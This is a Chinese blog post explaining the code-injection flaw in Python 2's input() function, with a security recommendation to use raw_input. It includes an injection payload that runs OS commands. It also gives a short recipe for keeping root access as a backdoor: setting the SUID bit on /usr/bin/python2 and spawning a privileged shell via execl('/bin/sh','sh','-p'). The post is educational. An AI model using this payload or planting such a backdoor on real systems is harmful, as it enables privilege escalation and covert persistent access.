python2的input,关于python2.x input函数的安全隐患

最新推荐文章于 2023-05-04 14:53:44 发布
最新推荐文章于 2023-05-04 14:53:44 发布
阅读量203 收藏
点赞数
文章标签: python2的input

secret_value = 500

i = input('Guess secret_value:')

if i == secret_value:

print('you win!')

else:

print('you lose!')

input输入secret_value结果如下:

668bfbdb6813

raw_input()会将输入的数据默认当成字符串

input()会自动识别数据类型,并且会将算式进行运算,这也是漏洞产生的原因

而在python3中,python3的input函数已经代替了raw_input函数,默认字符串输出

用以下代码实验一下

c = 'john'

i = input('name:')

print(i)

输入 1+1 和 c,看到结果都做了运算

668bfbdb6813

利用input执行命令

输入__import__('os').system('dir')执行dir命令,成功执行

668bfbdb6813

因此,在python2环境的开发中,应尽量使用raw_input函数来代替input函数

一个简单利用:

假设我们获取了一台服务器的root权限

我们可以用命令 chmod 4777 /usr/bin/python2 为二进制文件赋予特殊权限位(suid)

将 input('getshell:') 写入py文件

接下来切换到普通用户,运行脚本

input出输入 __import__('os').execl('/bin/sh','sh','-p')

668bfbdb6813

可以看到直接弹回一个root权限的shell

不过只是单单作为提权后的维持权限的后门

我是公务员
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python面试题Python2.x和Python3.x的区别
01-20
下面看下python2.x和python3.x的区别 1.大环境不同  python2.x:源码重复,不规范  python3.x:整合源码,更清晰优美简单  2.默认编码不同  python2.x:默认编码ASCII编码  python3.x:默认编码UTF-8 3.python3...
Python input函数使用实例解析
09-18
主要介绍了Python input函数使用实例,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
【软考中级】2022下半年软件设计师综合知识真题与答案
笔触狂放的博客
05-04 1万+
采用了(62)算法设计筑略。对有序数组(3,14,27,39,42,55,70,85,93,50、在Python3中,执行语句x-imput(),如果从键盘输入123并按回车键,则x。41、42、UML活动图用于建模(41)以下活动图中,活动A1之后,可能的活动执。系P(工程号,工程名,前期工程号)、参与关系EP(员工号,工程号,工作量)。名,部门号,岗位,联系地址,薪资),函数依赖集F={教师号→(姓名,部门号,岗。54、55、给定员工关系E(员工号,员工名,部门名,电话,家庭住址)、工程关。
python2 input漏洞_Python 中的 10 个常见安全漏洞,以及如何避免
weixin_39827589的博客
12-08 361
简评:编写安全代码很困难,当你学习一个编程语言、模块或框架时,你会学习其使用方法。 在考虑安全性时,你需要考虑如何避免被滥用,Python 也不例外,即使在标准库中,也存在用于编写应用的不良实践。然而,许多 Python 开发人员却根本不知道它们。1. 输入注入(Input injection)注入攻击非常广泛而且很常见,注入有很多种类,它们影响所有的语言、框架和环境。SQL 注入是直接编写 SQ...
python2 input函数,python2 && python3 的 input函数
weixin_29504817的博客
03-25 1096
Python2.x中的input()函数input()函数让我们明确我们输入的是数字格式还是字符格式,就是我们自己要知道我们想要的是什么,数字格式直接输入,字符格式必须加上单引号或者双引号,以确定我们输入的是字符串。Python2.x中的raw_input()函数:>>> a = raw_input("Please input your name: ")Please input ...
python2.x与3.x,input()的区别。input(),输入报错is not defined
qq_35606790的博客
06-17 1171
python2.x版本与Python3.x版本是有不同的。 Python3.x 中 input() 函数接受一个标准输入数据,返回为 string 类型。 Python2.x 中 input() 相等于 eval(raw_input(prompt)) ,用来获取控制台的输入。raw_input() 将所有输入作为字符串看待,返回字符串类型。而 input() 在对待纯数字输入时具有自己的特性,它返...
练习11——输入(python2.x与3.x input的区别)
wws563的专栏
06-20 2078
# -*- coding: utf-8 -*- #输入练习
Python如何使用input函数获取输入
09-16
主要介绍了Python如何使用input函数获取输入,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Python3中的input函数详解
09-20
下面小编就为大家分享一篇对Python3中的input函数详解,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
PythonPythoninput的使用
Catullus的博客
11-30 1万+
input有类似c中的scanf函数Python2中input使用如下:>>>x = input("x: ") x: 3 >>>y = input("y" ) y: 4 >>> print x*y 12但是Python3中input使用会有如下的提示:>>> x=input("x:") x:3 >>> y=input("y:") y:5 >>> print (x*y) Traceback (mos
python2 && python3 的 input函数
weixin_30284355的博客
07-18 97
Python2.x中的input()函数input()函数让我们明确我们输入的是数字格式还是字符格式,就是我们自己要知道我们想要的是什么,数字格式直接输入,字符格式必须加上单引号或者双引号,以确定我们输入的是字符串。 Python2.x中的raw_input()函数:>>> a = raw_input("Please input your name: ")Pl...
pythoninput输入数字_安全检查中...
weixin_39956110的博客
12-21 81
+((!+[]+(!![])+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!+[]+(!![])+!![]+!![])+(+!![])+(!+[]-(!![]))+(!+[]+(!![])+!![]+!![]+!![]+!![]+!![]+!![])+(!+[]+(!![])+!![])+(!+[]+(!![])+!![]+!![]+!![]+!![]+!![]...
python2.x中input跟raw_input的区别
飞行的荷兰猪
05-30 240
对于标准输入的处理,不同于py3,将所有标准输入均处理为字符串,py2中则严格区分数值跟字符串。 py3: print(type(input())) >>12 12 <class 'str'> py2: print(type(input())) >>12 12 <type 'int'> 但是对于py2 input字符串去有所不同: pri...
python2 与python3 input变化
Chelydra的博客
05-01 3663
input 输入     用法1: input(“提示信息/亦可空缺”); 结果为 双引号内字符串;不保存 只输出后续填写信息。Python2 使用为表达式,若为数字计算符则会计算输出结果。                 用法2: 变量 = input(“提示信息/亦可空缺”); 结果为 不显示字符,后续填写信息保存在变量当中   输入变量运行显示才输入信息。 raw_input输入
python 】 —— 库:openpyxl (python文件读写excel)
它的专栏
03-15 228
文档 一、基本操作 参考:https://www.cnblogs.com/anpengapple/p/6399304.html?utm_source=itdadao&utm_medium=referral 1、读取.xlsx文件。 from openpyxl import load_workbook wb = load_workbook("template.xlsx") ...
Linux面试题
热门推荐
木村的博客
06-26 19万+
常用命令 艿艿:这一小节会非常非常非常长,当做温故知新吧。 另外,面试官也可能会问,你熟悉 Linux 么?你平时使用哪些 Linux 命令。酱紫的连环炮~ 当然,建议重点看下 「性能相关」 小节。 目录相关 find 命令 《Linux 命令大全 —— find 命令》 查找指定文件名的文件(不区分大小写):find -iname "MyProgram.c" 。 对找到的文件执行某个命令:...
python2.x和python3.x中raw_input( )和input( )区别
suibianshen2012的专栏
05-11 3万+
备注: 1、在python2.x中raw_input( )和input( ),两个函数都存在,其中区别为 raw_input( )---将所有输入作为字符串看待,返回字符串类型 input( )-----只能接收“数字”的输入,在对待纯数字输入时具有自己的特性,它返回所输入的数字的类型( int, float ) 2、在python3.x中raw_input(
Python2中input()函数漏洞
SkYe's Blog
09-13 1560
函数简介 input()函数python中的内置函数,函数作用是从stdin中读取数据 input() 与 raw_input() 区别 python2 两个常见输入函数input 和 raw_input 。 raw_input() 会将输入的内容转换为字符串: #!/usr/bin/env python # -*- coding: utf-8 -*- a1 = raw_input("字符串:") print type(a1) a2 = raw_input("数字:") print type(a2)
Python 2.x和Python 3.x中input()函数的返回值都是字符串
最新发布
05-28
是的,您说得对。...在Python 2.x中,还有一个raw_input()函数,它与Python 3.x中的input()函数类似,也是用于接收用户输入,但是它返回的是一个字符串对象。在Python 3.x中,raw_input()函数已经被废弃了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值